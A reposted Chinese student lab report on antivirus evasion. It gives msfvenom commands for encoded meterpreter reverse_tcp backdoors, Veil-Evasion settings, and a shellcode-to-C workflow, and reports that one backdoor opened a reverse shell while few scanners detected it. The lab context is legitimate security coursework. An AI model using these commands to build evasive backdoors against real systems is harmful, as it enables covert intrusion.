博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20145239杜文超《网络对抗》- 免杀原理与实践
阅读量:5240 次
发布时间:2019-06-14

本文共 1637 字,大约阅读时间需要 5 分钟。

《网络对抗》- 免杀原理与实践

基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 根据搜集来的最全的、最新的特征码库,检测程序有没有异常或者可疑的行为。

(2)免杀是做什么?

  • 利用一些手段,让你的的后门不被AV软件发现。

(3)免杀的基本方法有哪些?

  • 加壳、用其他语言进行重写再编译。
  • 使用反弹式连接。
  • 自己手工编一个。

实践总结与体会

      这次的免杀实验做得非常顺利,每一个步骤基本上都一次成功,虽然这正是我所希望的但也有不好就是万一下次遇到问题可能不会解决,毕竟遇到问题、解决问题的过程才能让学习的效果达到最大化。最令我得意的是我把win10自带的Windowsdefender关闭后,明目张胆地运行我的后门,然后打开腾讯管家进行杀毒,居然!没有发现威胁,可喜又可悲,我一个菜鸟级别的黑客做得经过免杀处理的后门居然都杀不掉,那遇到大神做得那该咋办呢?

离实战还缺些什么技术或步骤?

  • 如何把后门悄无声息的植入到被攻击者的电脑里,还有控制端需要一个稳定的ip地址来监听靶机。
  • 杀毒软件的病毒库更新太快,自己编写很有难度,所以还需要对代码有更深层次的理解。

实践过程记录

msfvenom直接生成meterpreter可执行文件

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.128 PORT=208 -f exe > test_20145239.exe

  • 果然,一大半的杀软都查出来了。

Msfvenom使用编码器生成可执行文件

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.119.128 LPORT=208 -f exe > 5239-encoded.exe

  • 效果也不理想,看来编码也没什么用

Veil-Evasion生成可执行文件

  • 因为我使用了老师的虚拟机,自带Veil-Evasion,所以直接开始实验
  • 在终端下输入指令veil-evasion即可打开软件,依次输入以下指令:

use python/meterpreter/rev_tcp //设置payload

set LHOST 192.168.119.128 //设置反弹连接IP

set LPORT 4444 //设置反弹端口4444

generate //生成

test2_5239//程序名

1

  • 生成的后门直接拿去检测

  • 还行还行,只有25%的杀软查出来了。

利用shellcode编写后门程序的检测

  • 先使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.128 LPORT=443 -f c生成一个c语言格式的Shellcode数组
  • 然后利用VS2013打开老师给出的代码,修改修改(代码具体内容自行脑补,嘿嘿)

  • 完成后编译运行
  • win下的exe就相当于后门

  • 看一下kali,已经反弹连接成功了

  • 依旧输入一下dir指令试试,成功获得文件目录信息!

  • 再次使用virscan扫描一下,大获成功,只有10%的杀毒软件杀出了我的后门。

  • 好,现在来测试一下我电脑上的杀毒软件吧!先关闭windowsdefender打开腾讯电脑管家。
  • 扫描一下病毒:

  • 天哪!居然无风险项。再在kali使用后门截个图,一点影响都没有,照常使用。

  • 好吧,腾讯电脑管家太不靠谱了,天知道他漏过了多少后门,打开win下的windowsdefender扫描试试:

  • 上次实验我没做免杀的后门分分钟就被杀了,这次还是给力的杀出了我后门。
  • 看来windowsdefender没有网上说的那么一无是处还是很优秀的。

 

  • 最后附上我电脑上的杀软版本:

 

转载于:https://www.cnblogs.com/dwc929210354/p/6610875.html

你可能感兴趣的文章
SqlHelper发布—比Pagehelper更好用的分页插件
查看>>
Java-垃圾收集
查看>>
TWaver局部自动布局及嵌套Group处理
查看>>
39、python模块学习-logging模块
查看>>
Uber优步北京第四组奖励政策
查看>>
算法之 栈的顺序结构
查看>>
【一次面试】再谈javascript中的继承
查看>>
OpenStack cloud 第一天
查看>>
tomcat部属项目时报错:An internal error occurred during Add Deployment.java.lang.NullPointerException...
查看>>
pandas
查看>>
amoeba连接mysql--ERROR 2006 (HY000): MySQL server has gone away
查看>>
http://overapi.com/
查看>>
游戏生命周期和新服的关系
查看>>
gitlab与gitlab服务器之间的代码迁移
查看>>
NEU校园网登录器
查看>>
如何使用微信小程序video组件播放视频
查看>>
angular清除select空格
查看>>
实验10 指针进阶 程序四
查看>>
java笔记--超级类Object多线程的应用+哲学家进餐算法内部类与多线程结合
查看>>
java笔记--反射进阶之总结与详解
查看>>